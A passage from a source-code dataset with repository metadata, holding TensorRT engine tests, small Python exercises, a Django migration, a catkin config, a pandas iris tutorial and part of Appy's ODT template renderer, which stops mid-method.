builder, network = identity_builder_network
loader = EngineFromNetwork((builder, network))
with loader():
pass
def test_can_build_with_calibrator(self, identity_builder_network):
builder, network = identity_builder_network
calibrator = Calibrator(DataLoader())
create_config = CreateConfig(int8=True, calibrator=calibrator)
loader = EngineFromNetwork((builder, network), create_config)
with loader():
pass
# Calibrator buffers should be freed after the build
assert all([buf.allocated_nbytes == 0 for buf in calibrator.device_buffers.values()])
@pytest.mark.skipif(mod.version(trt.__version__) < mod.version("8.0"), reason="Unsupported for TRT 7.2 and older")
@pytest.mark.parametrize("path_mode", [True, False], ids=["path", "file-like"])
def test_timing_cache_generate_and_append(self, path_mode):
with util.NamedTemporaryFile() as total_cache, util.NamedTemporaryFile() as identity_cache:
def build_engine(model, cache):
if not path_mode:
cache.seek(0)
network_loader = NetworkFromOnnxBytes(ONNX_MODELS[model].loader)
# In non-path_mode, use the file-like object directly.
# Must load the cache with CreateConfig so that new data is appended
# instead of overwriting the previous cache.
loader = EngineFromNetwork(
network_loader,
CreateConfig(load_timing_cache=cache.name),
save_timing_cache=cache.name if path_mode else cache,
)
with loader():
pass
if not path_mode:
cache.seek(0)
assert not total_cache.read()
build_engine("const_foldable", total_cache)
const_foldable_cache_size = get_file_size(total_cache.name)
# Build this network twice. Once with a fresh cache so we can determine its size.
assert get_file_size(identity_cache.name) == 0
build_engine("identity", identity_cache)
identity_cache_size = get_file_size(identity_cache.name)
build_engine("identity", total_cache)
total_cache_size = get_file_size(total_cache.name)
# The total cache should be larger than either of the individual caches.
assert total_cache_size > const_foldable_cache_size and total_cache_size > identity_cache_size
# The total cache should also be smaller than or equal to the sum of the individual caches since
# header information should not be duplicated.
assert total_cache_size <= (const_foldable_cache_size + identity_cache_size)
class TestBytesFromEngine(object):
def test_serialize_engine(self, identity_network):
with engine_from_network(identity_network) as engine:
serialized_engine = bytes_from_engine(engine)
assert isinstance(serialized_engine, bytes)
class TestSaveEngine(object):
def test_save_engine(self, identity_network):
with util.NamedTemporaryFile() as outpath:
engine_loader = SaveEngine(EngineFromNetwork(identity_network), path=outpath.name)
with engine_loader():
assert is_file_non_empty(outpath.name)
class TestOnnxLikeFromNetwork(object):
@pytest.mark.skipif(mod.version(trt.__version__) < mod.version("7.2"), reason="Unsupported for TRT 7.1 and older")
@pytest.mark.parametrize(
"model_name", ["identity", "empty_tensor_expand", "const_foldable", "and", "scan", "dim_param", "tensor_attr"]
)
def test_onnx_like_from_network(self, model_name):
assert onnx_like_from_network(NetworkFromOnnxBytes(ONNX_MODELS[model_name].loader))
| [
"[email protected]"
]
| |
352fc2592e428da6a89e6a9b67cbe4e96f892a87 | 3ca6b34676a0adeaba85a2953a8c9abf5d6ef3e4 | /cap 2/ex2.3 mensagem_pessoal.py | d266787bc99096ebbba2c49184dbe991fa9c8afc | []
| no_license | giusepper11/Curso-intensivo-Python | 34fb8e94c7c9afb09f54d8fc67136b337d0ef106 | 613cd502af3ff877dac0d62d9eb09b290d227838 | refs/heads/master | 2021-08-30T11:41:42.824065 | 2017-12-17T19:47:15 | 2017-12-17T19:47:15 | 114,535,941 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 91 | py | name = "Giuseppe"
print('Alo ' + name + ', voce gostaria de aprender mais sobre python? ')
| [
"[email protected]"
]
| |
804b7d2aeaf690de61b0b87bbb40796c12287a2a | dfaf5cd5607c2c4e55ec9173d2d7ca12842db129 | /104_findDiagonalOrder.py | add0e471b6091ea711a6ab960ca377f92f09bd77 | []
| no_license | khinthandarkyaw98/Leetcode | 2b0be053931b3ddec6309d136228dae1f4c61b2b | 578f2a38d8a41864ebfd6c4e941f6915c7c0a508 | refs/heads/master | 2023-06-24T02:34:59.399319 | 2021-07-14T19:37:14 | 2021-07-14T19:37:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 488 | py | import collections
class Solution:
def findDiagonalOrder(self, nums: List[List[int]]) -> List[int]:
res = []
q = collections.deque()
q.append((0,0))
while q:
row, col = q.popleft()
if col == 0 and row < len(nums)-1:
q.append((row + 1, col))
if col< len(nums[row])-1:
q.append((row, col+1))
res.append(nums[row][col])
return res
| [
"[email protected]"
]
| |
be4a4e2c0ee32b41a05520c16e30dac4c1106efe | 922e923bdab099efa7161f5806ed262ba5cc84c4 | /apps/documents/migrations/0006_boardmeetingaudio_boardmeetingvideo.py | 22c1e2091ad36ddb3047bb2b82dd82b211ce2165 | [
"MIT"
]
| permissive | iamjdcollins/districtwebsite | eadd45a7bf49a43e6497f68a361329f93c41f117 | 89e2aea47ca3d221665bc23586a4374421be5800 | refs/heads/master | 2021-07-05T19:06:12.458608 | 2019-02-20T17:10:10 | 2019-02-20T17:10:10 | 109,855,661 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,722 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-12-11 17:04
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('objects', '0005_auto_20171210_1447'),
('documents', '0005_boardmeetingagenda_boardmeetingminutes'),
]
operations = [
migrations.CreateModel(
name='BoardMeetingAudio',
fields=[
('title', models.CharField(max_length=200)),
('boardmeetingaudio_document_node', models.OneToOneField(db_column='boardmeetingaudio_document_node', editable=False, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='objects.Document')),
('related_node', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='documents_boardmeetingaudio_node', to='objects.Node')),
],
options={
'permissions': (('trash_boardmeetingaudio', 'Can soft delete board meeting audio'), ('restore_boardmeetingaudio', 'Can restore board meeting audio')),
'verbose_name_plural': 'Board Meeting Audio',
'default_manager_name': 'objects',
'db_table': 'documents_boardmeetingaudio',
'get_latest_by': 'update_date',
'verbose_name': 'Board Meeting Audio',
},
bases=('objects.document',),
),
migrations.CreateModel(
name='BoardMeetingVideo',
fields=[
('title', models.CharField(max_length=200)),
('boardmeetingvideo_document_node', models.OneToOneField(db_column='boardmeetingvideo_document_node', editable=False, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='objects.Document')),
('related_node', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='documents_boardmeetingvideo_node', to='objects.Node')),
],
options={
'permissions': (('trash_boardmeetingvideo', 'Can soft delete board meeting video'), ('restore_boardmeetingvideo', 'Can restore board meeting video')),
'verbose_name_plural': 'Board Meeting Videos',
'default_manager_name': 'objects',
'db_table': 'documents_boardmeetingvideo',
'get_latest_by': 'update_date',
'verbose_name': 'Board Meeting Video',
},
bases=('objects.document',),
),
]
| [
"[email protected]"
]
| |
71420c46e794fbf9129e80cd832982ba3453f560 | c0836fbc0d26ec5b4fbef8b116536ee1573a63e3 | /1_basic/2_pandas/pandas_15.py | c103bccdeca3d2290f5bb6aabbc243f1cc9500b8 | []
| no_license | SungmanHan/machineLearningStudy | 5e4c2869351cceddb6cd212323c4a710a97984cc | 36854f946252158b2cdb18b6842f0c905d0811b1 | refs/heads/master | 2020-07-12T21:21:18.126845 | 2019-09-25T13:23:50 | 2019-09-25T13:23:50 | 204,908,533 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,567 | py | # -*- coding: utf-8 -*-
import pandas as pd
# 사이킷 런의 sklearn.datasets 패키지 내부의
# 학습 데이터를 로딩하는 코드
# (load_... 이름으로 함수가 정의되어 있음)
from sklearn.datasets import load_iris
# iris 데이터를 로딩하는 코드
iris_data = load_iris()
# Bunch 클래스 타입의 값이 반환
# 파이썬의 딕셔너리와 유사한 타입으로
# 키값을 사용하여 데이터를 추출할 수 있음
print(type(iris_data))
# Bunch 클래스 keys 메소드
# 사용할 수 있는 키의 목록을 반환하는 메소드
print(iris_data.keys())
# 키 값 'data' 는 특성 데이터를 반환
# (numpy 2차원 배열의 형태)
print(iris_data['data'])
print(iris_data.data)
print(type(iris_data.data))
# pandas 데이터 프레임으로
# 특성 데이터를 저장
X_df = pd.DataFrame(iris_data.data)
# Bunch 클래스의 타입의 feature_names 키 값을
# 사용하여 데이터프레임의 헤더를 설정
X_df.columns = iris_data.feature_names
# iris 데이터의 샘플 개수 및 결측데이터 확인
print(X_df.info())
# iris 데이터의 수치 데이터 통계 확인
print(X_df.describe())
# 라벨 데이터의 데이터프레임 생성
# 키 값 'target' 은 라벨 데이터를 반환
# (numpy 1차원 배열의 형태)
y_df = pd.Series(iris_data.target)
# 데이터의 확인
# 사이킷 런에서 제공되는 데이터들은
# 전처리가 완료된 상태의 데이터이므로
# 문자열이 아닌 수치 데이터가 제공됨
print(y_df)
# 라벨 데이터의 분포 확인
print(y_df.value_counts())
print(y_df.value_counts() / len(y_df))
# 특성 데이터와 라벨 데이터의 결합
all_df = pd.concat([X_df, y_df], axis=1)
# pandas 옵션을 사용하여 화면에 출력할
# 최대 컬럼 개수를 조정
pd.options.display.max_columns = 10
print(all_df)
# 데이터 프레임 내부의 특성 간 상관관계를
# 분석하여 반환하는 메소드 - corr()
corr_df = all_df.corr()
# 결과(라벨) 데이터와 특성 데이터들간의
# 상관관계를 출력
# 1에 가까울수록 강한 양의 상관관계를 보여줌
# (라벨 데이터의 수치가 커질수록 특성 데이터의
# 값이 증가)
# 0에 가까울수록 약한 상관관계를 보여줌
# (특성 데이터의 수치 변화가 특성 데이터와 관계없음)
# -1에 가까울수록 강한 음의 상관관계를 보여줌
# (특성 데이터의 수치가 커질수록 특성 데이터의
# 값이 감소)
print(corr_df)
print(iris_data.target_names)
| [
"[email protected]"
]
| |
8edae035598a6bff9f6a7325d526abfd07cb3fab | e5ba55ac56d2d07aeebd7253fbe5d186196c9a52 | /catkin_ws/catkin_ws/build/iai_kinect2/kinect2_registration/catkin_generated/pkg.installspace.context.pc.py | 85e878c71d08a7cf827ee4e610db3258f4e5642e | []
| no_license | masiro97/darrsm | 5305a3e7c1fba2635a4925b9e079f45b40162862 | b881d00427d2af5d75ca509a191e57f2890e1ece | refs/heads/master | 2021-05-10T21:57:17.760536 | 2018-01-20T15:13:56 | 2018-01-20T15:13:56 | 111,084,804 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 605 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/cun/catkin_ws/install/include;/usr/include".split(';') if "/home/cun/catkin_ws/install/include;/usr/include" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lkinect2_registration;-l:/usr/lib/x86_64-linux-gnu/libOpenCL.so".split(';') if "-lkinect2_registration;-l:/usr/lib/x86_64-linux-gnu/libOpenCL.so" != "" else []
PROJECT_NAME = "kinect2_registration"
PROJECT_SPACE_DIR = "/home/cun/catkin_ws/install"
PROJECT_VERSION = "0.0.1"
| [
"[email protected]"
]
| |
989cebdde1f1edb13d8b2c625c233a9d8db44468 | cd04112e1b8995cabb3464fe408c308aa3005bdd | /pylib/appy/pod/renderer.py | cd28abab24a9009d15aec2f623c459106b8ec56f | []
| no_license | vampolo/cacerp | 6fc132bf827fb9ec245f32d6caf6d4c5ab827e2d | 57aef2008ae4cb6e783d46b0cfc7cfc32b16a54c | refs/heads/master | 2021-01-19T05:28:57.675300 | 2011-03-28T17:17:24 | 2011-03-28T17:17:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,528 | py | # ------------------------------------------------------------------------------
# Appy is a framework for building applications in the Python language.
# Copyright (C) 2007 Gaetan Delannay
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,USA.
# ------------------------------------------------------------------------------
import zipfile, shutil, xml.sax, os, os.path, re, mimetypes, time
from UserDict import UserDict
import appy.pod
from appy.pod import PodError
from appy.shared import mimeTypesExts
from appy.shared.xml_parser import XmlElement
from appy.shared.utils import FolderDeleter, executeCommand
from appy.pod.pod_parser import PodParser, PodEnvironment, OdInsert
from appy.pod.converter import FILE_TYPES
from appy.pod.buffers import FileBuffer
from appy.pod.xhtml2odt import Xhtml2OdtConverter
from appy.pod.doc_importers import OdtImporter, ImageImporter, PdfImporter
from appy.pod.styles_manager import StylesManager
# ------------------------------------------------------------------------------
# Error and warning messages used by the Renderer below. All "%s" placeholders
# are filled in with the '%' operator at the point where the message is
# raised or logged.
BAD_CONTEXT = 'Context must be either a dict, a UserDict or an instance.'
RESULT_FILE_EXISTS = 'Result file "%s" exists.'
CANT_WRITE_RESULT = 'I cannot write result file "%s". %s'
TEMP_FOLDER_EXISTS = 'I need to use a temp folder "%s" but this folder ' \
                     'already exists.'
CANT_WRITE_TEMP_FOLDER = 'I cannot create temp folder "%s". %s'
NO_PY_PATH = 'Extension of result file is "%s". In order to perform ' \
             'conversion from ODT to this format we need to call OpenOffice. ' \
             'But the Python interpreter which runs the current script does ' \
             'not know UNO, the library that allows to connect to ' \
             'OpenOffice in server mode. If you can\'t install UNO in this ' \
             'Python interpreter, you can specify, in parameter ' \
             '"pythonWithUnoPath", the path to a UNO-enabled Python ' \
             'interpreter. One such interpreter may be found in ' \
             '<open_office_path>/program.'
PY_PATH_NOT_FILE = '"%s" is not a file. You must here specify the absolute ' \
                   'path of a Python interpreter (.../python, .../python.sh, ' \
                   '.../python.exe, .../python.bat...).'
BLANKS_IN_PATH = 'Blanks were found in path "%s". Please use the DOS-names ' \
                 '(ie, "progra~1" instead of "Program files" or "docume~1" ' \
                 'instead of "Documents and settings".'
BAD_RESULT_TYPE = 'Result "%s" has a wrong extension. Allowed extensions ' \
                  'are: "%s".'
CONVERT_ERROR = 'An error occurred during the conversion. %s'
BAD_OO_PORT = 'Bad OpenOffice port "%s". Make sure it is an integer.'
XHTML_ERROR = 'An error occurred while rendering XHTML content.'
WARNING_INCOMPLETE_ODT = 'Warning: your ODT file may not be complete (ie ' \
                         'imported documents may not be present). This is ' \
                         'because we could not connect to OpenOffice in ' \
                         'server mode: %s'
DOC_NOT_SPECIFIED = 'Please specify a document to import, either with a ' \
                    'stream (parameter "content") or with a path (parameter ' \
                    '"at")'
DOC_FORMAT_ERROR = 'POD was unable to deduce the document format. Please ' \
                   'specify it through parameter named "format" (=odt, gif, ' \
                   'png, ...).'
DOC_WRONG_FORMAT = 'Format "%s" is not supported.'
WARNING_FINALIZE_ERROR = 'Warning: error while calling finalize function. %s'
# Default automatic text styles added by pod in content.xml. The XML chunks
# below are read from files shipped next to this module; "@...@" placeholders
# are substituted with real namespace prefixes when the chunks are inserted
# into the result (see the OdInsert objects built in Renderer.__init__).
f = open('%s/styles.in.content.xml' % os.path.dirname(appy.pod.__file__))
CONTENT_POD_STYLES = f.read()
f.close()
# Default font added by pod in content.xml
CONTENT_POD_FONTS = '<@style@:font-face style:name="PodStarSymbol" ' \
                    '@svg@:font-family="StarSymbol"/>'
# Default text styles added by pod in styles.xml
# Use builtin 'open' (not the Python-2-only 'file' builtin), consistently with
# the read of styles.in.content.xml above.
f = open('%s/styles.in.styles.xml' % os.path.dirname(appy.pod.__file__))
STYLES_POD_STYLES = f.read()
f.close()
# Default font added by pod
STYLES_POD_FONTS = '<@style@:font-face @style@:name="PodStarSymbol" ' \
                   '@svg@:font-family="StarSymbol"/>'
# ------------------------------------------------------------------------------
class Renderer:
    def __init__(self, template, context, result, pythonWithUnoPath=None,
                 ooPort=2002, stylesMapping={}, forceOoCall=False,
                 finalizeFunction=None):
        '''This Python Open Document Renderer (PodRenderer) loads a document
           template (p_template) which is an ODT file with some elements
           written in Python. Based on this template and some Python objects
           defined in p_context, the renderer generates an ODT file
           (p_result) that instantiates the p_template and fills it with
           objects from the p_context.
           - If p_result does not end with .odt, the Renderer will call
             OpenOffice to perform a conversion. If p_forceOoCall is True, even
             if p_result ends with .odt, OpenOffice will be called, not for
             performing a conversion, but for updating some elements like
             indexes (table of contents, etc) and sections containing links to
             external files (which is the case, for example, if you use the
             default function "document").
           - If the Python interpreter which runs the current script is not
             UNO-enabled, this script will run, in another process, a
             UNO-enabled Python interpreter (whose path is p_pythonWithUnoPath)
             which will call OpenOffice. In both cases, we will try to connect
             to OpenOffice in server mode on port p_ooPort.
           - If you plan to make "XHTML to OpenDocument" conversions, you may
             specify a styles mapping in p_stylesMapping.
           - If you specify a function in p_finalizeFunction, this function
             will be called by the renderer before re-zipping the ODT result.
             This way, you can still perform some actions on the content of the
             ODT file before it is zipped and potentially converted. This
             function must accept one arg: the absolute path to the temporary
             folder containing the un-zipped content of the ODT result.
           NOTE(review): p_stylesMapping defaults to a mutable dict shared
           across calls; safe only as long as it is never mutated in place —
           confirm against setStylesMapping/checkStylesMapping.'''
        # Store the rendering parameters on the instance.
        self.template = template
        self.templateZip = zipfile.ZipFile(template)
        self.result = result
        self.contentXml = None # Content (string) of content.xml
        self.stylesXml = None # Content (string) of styles.xml
        self.stylesManager = None # Manages the styles defined into the ODT
                                  # template
        self.tempFolder = None
        self.env = None
        self.pyPath = pythonWithUnoPath
        self.ooPort = ooPort
        self.forceOoCall = forceOoCall
        self.finalizeFunction = finalizeFunction
        # Retain potential files or images that will be included through
        # "do ... from document" statements: we will need to declare them in
        # META-INF/manifest.xml.
        self.fileNames = []
        # prepareFolders (defined elsewhere in this class) presumably sets
        # self.tempFolder — confirm in its body.
        self.prepareFolders()
        # Unzip the template into a dedicated subfolder of the temp folder.
        self.unzipFolder = os.path.join(self.tempFolder, 'unzip')
        os.mkdir(self.unzipFolder)
        for zippedFile in self.templateZip.namelist():
            # Before writing the zippedFile into self.unzipFolder, create the
            # intermediary subfolder(s) if needed.
            fileName = None
            if zippedFile.endswith('/') or zippedFile.endswith(os.sep):
                # This is an empty folder. Create it nevertheless.
                os.makedirs(os.path.join(self.unzipFolder, zippedFile))
            else:
                fileName = os.path.basename(zippedFile)
                folderName = os.path.dirname(zippedFile)
                fullFolderName = self.unzipFolder
                if folderName:
                    fullFolderName = os.path.join(fullFolderName, folderName)
                if not os.path.exists(fullFolderName):
                    os.makedirs(fullFolderName)
            # Unzip the file in self.unzipFolder. fileName is None for folder
            # entries, which were already created above.
            if fileName:
                fullFileName = os.path.join(fullFolderName, fileName)
                f = open(fullFileName, 'wb')
                fileContent = self.templateZip.read(zippedFile)
                if (fileName == 'content.xml') and not folderName:
                    # content.xml files may reside in subfolders.
                    # We modify only the one in the root folder.
                    self.contentXml = fileContent
                elif (fileName == 'styles.xml') and not folderName:
                    # Same remark as above.
                    self.stylesManager = StylesManager(fileContent)
                    self.stylesXml = fileContent
                f.write(fileContent)
                f.close()
        self.templateZip.close()
        # Create the content.xml parser, with the XML chunks (fonts, automatic
        # styles) that pod must insert into content.xml.
        pe = PodEnvironment
        contentInserts = (
            OdInsert(CONTENT_POD_FONTS,
                     XmlElement('font-face-decls', nsUri=pe.NS_OFFICE),
                     nsUris={'style': pe.NS_STYLE, 'svg': pe.NS_SVG}),
            OdInsert(CONTENT_POD_STYLES,
                     XmlElement('automatic-styles', nsUri=pe.NS_OFFICE),
                     nsUris={'style': pe.NS_STYLE, 'fo': pe.NS_FO,
                             'text': pe.NS_TEXT, 'table': pe.NS_TABLE}))
        self.contentParser = self.createPodParser('content.xml', context,
                                                  contentInserts)
        # Create the styles.xml parser, with its own inserts.
        stylesInserts = (
            OdInsert(STYLES_POD_FONTS,
                     XmlElement('font-face-decls', nsUri=pe.NS_OFFICE),
                     nsUris={'style': pe.NS_STYLE, 'svg': pe.NS_SVG}),
            OdInsert(STYLES_POD_STYLES,
                     XmlElement('styles', nsUri=pe.NS_OFFICE),
                     nsUris={'style': pe.NS_STYLE, 'fo': pe.NS_FO}))
        self.stylesParser = self.createPodParser('styles.xml', context,
                                                 stylesInserts)
        # Stores the styles mapping (validated by setStylesMapping).
        self.setStylesMapping(stylesMapping)
    def createPodParser(self, odtFile, context, inserts):
        '''Creates the parser with its environment for parsing the given
           p_odtFile (content.xml or styles.xml). p_context is given by the pod
           user, while p_inserts depends on the ODT file we must parse.'''
        # Names that are always available in pod expressions, regardless of
        # the user-supplied context.
        evalContext = {'xhtml': self.renderXhtml,
                       'test': self.evalIfExpression,
                       'document': self.importDocument} # Default context
        # The user context may be any object (its __dict__ is used) or a
        # dict/UserDict instance; anything else is rejected.
        if hasattr(context, '__dict__'):
            evalContext.update(context.__dict__)
        elif isinstance(context, dict) or isinstance(context, UserDict):
            evalContext.update(context)
        else:
            raise PodError(BAD_CONTEXT)
        env = PodEnvironment(evalContext, inserts)
        # The result of parsing p_odtFile is accumulated into a file buffer
        # created inside the temp folder.
        fileBuffer = FileBuffer(env, os.path.join(self.tempFolder,odtFile))
        env.currentBuffer = fileBuffer
        return PodParser(env, self)
def renderXhtml(self, xhtmlString, encoding='utf-8', stylesMapping={}):
'''Method that can be used (under the name 'xhtml') into a pod template
for converting a chunk of XHTML content (p_xhtmlString) into a chunk
of ODT content.'''
stylesMapping = self.stylesManager.checkStylesMapping(stylesMapping)
ns = self.currentParser.env.namespaces
# xhtmlString is only a chunk of XHTML. So we must surround it a tag in
# order to get a XML-compliant file (we need a root tag)
xhtmlContent = '<podXhtml>%s</podXhtml>' % xhtmlString
return Xhtml2OdtConverter(xhtmlContent, encoding, self.stylesManager,
stylesMapping, ns).run()
def evalIfExpression(self, condition, ifTrue, ifFalse):
'''This method implements the method 'test' which is proposed in the
default pod context. It represents an 'if' expression (as opposed to
the 'if' statement): depending on p_condition, expression result is
p_ifTrue or p_ifFalse.'''
if condition:
return ifTrue
return ifFalse
imageFormats = ('png', 'jpeg', 'jpg', 'gif')
ooFormats = ('odt',)
def importDocument(self, content=None, at=None, format=None,
anchor='as-char'):
'''If p_at is not None, it represents a path or url allowing to find
the document. If p_at is None, the content of the document is
supposed to be in binary format in p_content. The document
p_format may be: odt or any format in imageFormats. p_anchor is only
relevant for images.'''
ns = self.currentParser.env.namespaces
importer = None
# Is there someting to import?
if not content and not at:
raise PodError(DOC_NOT_SPECIFIED)
# Guess document format
if not format:
# It should be deduced from p_at
if not at:
raise PodError(DOC_FORMAT_ERROR)
format = os.path.splitext(at)[1][1:]
else:
# If format is a mimeType, convert it to an extension
if mimeTypesExts.has_key(format):
format = mimeTypesExts[format]
isImage = False
if format in self.ooFormats:
importer = OdtImporter
self.forceOoCall = True
elif format in self.imageFormats:
importer = ImageImporter
isImage = True
elif format == 'pdf':
importer = PdfImporter
else:
raise PodError(DOC_WRONG_FORMAT % format)
imp = importer(content, at, format, self.tempFolder, ns)
if isImage:
imp.setAnchor(anchor)
res = imp.run()
if imp.fileNames:
self.fileNames += imp.fileNames
return res
    def prepareFolders(self):
        '''Checks that the result file is writable and creates the temp
           folder in which the result will be assembled.'''
        # Check if I can write the result
        if os.path.exists(self.result):
            raise PodError(RESULT_FILE_EXISTS % self.result)
        try:
            # Dummy write: proves the result location is writable; the file
            # is removed again just below.
            f = open(self.result, 'w')
            f.write('Hello')
            f.close()
        except OSError, oe:
            raise PodError(CANT_WRITE_RESULT % (self.result, oe))
        except IOError, ie:
            raise PodError(CANT_WRITE_RESULT % (self.result, ie))
        self.result = os.path.abspath(self.result)
        os.remove(self.result)
        # Check that temp folder does not exist
        self.tempFolder = os.path.abspath(self.result) + '.temp'
        if os.path.exists(self.tempFolder):
            raise PodError(TEMP_FOLDER_EXISTS % self.tempFolder)
        try:
            os.mkdir(self.tempFolder)
        except OSError, oe:
            raise PodError(CANT_WRITE_TEMP_FOLDER % (self.result, oe))
    def patchManifest(self):
        '''Declares, in META-INF/manifest.xml, images or files included via the
           "do... from document" statements if any.'''
        if self.fileNames:
            j = os.path.join
            # Build one <manifest:file-entry> element per included file.
            toInsert = ''
            for fileName in self.fileNames:
                mimeType = mimetypes.guess_type(fileName)[0]
                toInsert += ' <manifest:file-entry manifest:media-type="%s" ' \
                            'manifest:full-path="%s"/>\n' % (mimeType, fileName)
            manifestName = j(self.unzipFolder, j('META-INF', 'manifest.xml'))
            # "file" is the Python 2 built-in alias of "open".
            f = file(manifestName)
            manifestContent = f.read()
            # Insert the new entries just before the closing root tag.
            hook = '</manifest:manifest>'
            manifestContent = manifestContent.replace(hook, toInsert+hook)
            f.close()
            # Write the new manifest content
            f = file(manifestName, 'w')
            f.write(manifestContent)
            f.close()
# Public interface
    def run(self):
        '''Renders the result.'''
        # Remember which parser is running: renderXhtml/importDocument read
        # self.currentParser, so it must be set before parsing starts.
        self.currentParser = self.contentParser
        # Create the resulting content.xml
        self.currentParser.parse(self.contentXml)
        self.currentParser = self.stylesParser
        # Create the resulting styles.xml
        self.currentParser.parse(self.stylesXml)
        # Patch META-INF/manifest.xml
        self.patchManifest()
        # Re-zip the result
        self.finalize()
    def getStyles(self):
        '''Returns a dict of the styles that are defined into the template.'''
        # Styles were parsed out of styles.xml by the StylesManager.
        return self.stylesManager.styles
    def setStylesMapping(self, stylesMapping):
        '''Establishes a correspondance between, on one hand, CSS styles or
           XHTML tags that will be found inside XHTML content given to POD,
           and, on the other hand, ODT styles found into the template.

           If the mapping is invalid, open result buffers are closed and the
           temp folder is removed before the error is propagated.'''
        try:
            stylesMapping = self.stylesManager.checkStylesMapping(stylesMapping)
            self.stylesManager.stylesMapping = stylesMapping
        except PodError, po:
            # Clean up: close both result buffers and delete the temp folder
            # so nothing is left behind after the failed rendering setup.
            self.contentParser.env.currentBuffer.content.close()
            self.stylesParser.env.currentBuffer.content.close()
            if os.path.exists(self.tempFolder):
                FolderDeleter.delete(self.tempFolder)
            raise po
    def reportProblem(self, msg, resultType):
        '''When trying to call OO in server mode for producing ODT
           (=forceOoCall=True), if an error occurs we still have an ODT to
           return to the user. So we produce a warning instead of raising an
           error.'''
        if (resultType == 'odt') and self.forceOoCall:
            print WARNING_INCOMPLETE_ODT % msg
        else:
            # NOTE(review): p_msg is raised as-is, so it is presumably an
            # exception instance rather than a string (raising a plain
            # string is invalid from Python 2.6 on) -- confirm with callers.
            raise msg
    def callOpenOffice(self, resultOdtName, resultType):
        '''Call Open Office in server mode to convert or update the ODT
           result. Returns the output of the external converter process
           (an empty string when the in-process UNO converter was used).'''
        ooOutput = ''
        try:
            # The OO server port must be an integer.
            if (not isinstance(self.ooPort, int)) and \
               (not isinstance(self.ooPort, long)):
                raise PodError(BAD_OO_PORT % str(self.ooPort))
            try:
                from appy.pod.converter import Converter, ConverterError
                # UNO is importable in this interpreter: convert in-process.
                try:
                    Converter(resultOdtName, resultType,
                              self.ooPort).run()
                except ConverterError, ce:
                    raise PodError(CONVERT_ERROR % str(ce))
            except ImportError:
                # I do not have UNO. So try to launch a UNO-enabled Python
                # interpreter which should be in self.pyPath.
                if not self.pyPath:
                    raise PodError(NO_PY_PATH % resultType)
                if self.pyPath.find(' ') != -1:
                    raise PodError(BLANKS_IN_PATH % self.pyPath)
                if not os.path.isfile(self.pyPath):
                    raise PodError(PY_PATH_NOT_FILE % self.pyPath)
                # Quote the result file name if it contains blanks, so the
                # command line stays parseable.
                if resultOdtName.find(' ') != -1:
                    qResultOdtName = '"%s"' % resultOdtName
                else:
                    qResultOdtName = resultOdtName
                convScript = '%s/converter.py' % \
                             os.path.dirname(appy.pod.__file__)
                if convScript.find(' ') != -1:
                    convScript = '"%s"' % convScript
                # Run the converter script in the external interpreter.
                cmd = '%s %s %s %s -p%d' % \
                      (self.pyPath, convScript, qResultOdtName, resultType,
                       self.ooPort)
                ooOutput = executeCommand(cmd)
        except PodError, pe:
            # When trying to call OO in server mode for producing
            # ODT (=forceOoCall=True), if an error occurs we still
            # have an ODT to return to the user. So we produce a
            # warning instead of raising an error.
            if (resultType == 'odt') and self.forceOoCall:
                print WARNING_INCOMPLETE_ODT % str(pe)
            else:
                raise pe
        return ooOutput
    def finalize(self):
        '''Re-zip the result and potentially call OpenOffice if target format is
           not ODT or if forceOoCall is True.'''
        # Copy the rendered content.xml and styles.xml over the template's
        # originals inside the unzipped template folder.
        for odtFile in ('content.xml', 'styles.xml'):
            shutil.copy(os.path.join(self.tempFolder, odtFile),
                        os.path.join(self.unzipFolder, odtFile))
        # Give the user-supplied hook a chance to post-process the files;
        # its failure only produces a warning, not an error.
        if self.finalizeFunction:
            try:
                self.finalizeFunction(self.unzipFolder)
            except Exception, e:
                print WARNING_FINALIZE_ERROR % str(e)
        resultOdtName = os.path.join(self.tempFolder, 'result.odt')
        try:
            # Compression needs zlib; fall back to an uncompressed zip.
            resultOdt = zipfile.ZipFile(resultOdtName,'w', zipfile.ZIP_DEFLATED)
        except RuntimeError:
            resultOdt = zipfile.ZipFile(resultOdtName,'w')
        for dir, dirnames, filenames in os.walk(self.unzipFolder):
            for f in filenames:
                # Store every file under its path relative to unzipFolder.
                folderName = dir[len(self.unzipFolder)+1:]
                resultOdt.write(os.path.join(dir, f),
                                os.path.join(folderName, f))
            if not dirnames and not filenames:
                # This is an empty leaf folder. We must create an entry in the
                # zip for him
                folderName = dir[len(self.unzipFolder):]
                zInfo = zipfile.ZipInfo("%s/" % folderName,time.localtime()[:6])
                # external_attr = 48 (0x30) marks the entry as a folder --
                # presumably the MS-DOS directory+archive bits; confirm.
                zInfo.external_attr = 48
                resultOdt.writestr(zInfo, '')
        resultOdt.close()
        resultType = os.path.splitext(self.result)[1]
        try:
            if (resultType == '.odt') and not self.forceOoCall:
                # Simply move the ODT result to the result
                os.rename(resultOdtName, self.result)
            else:
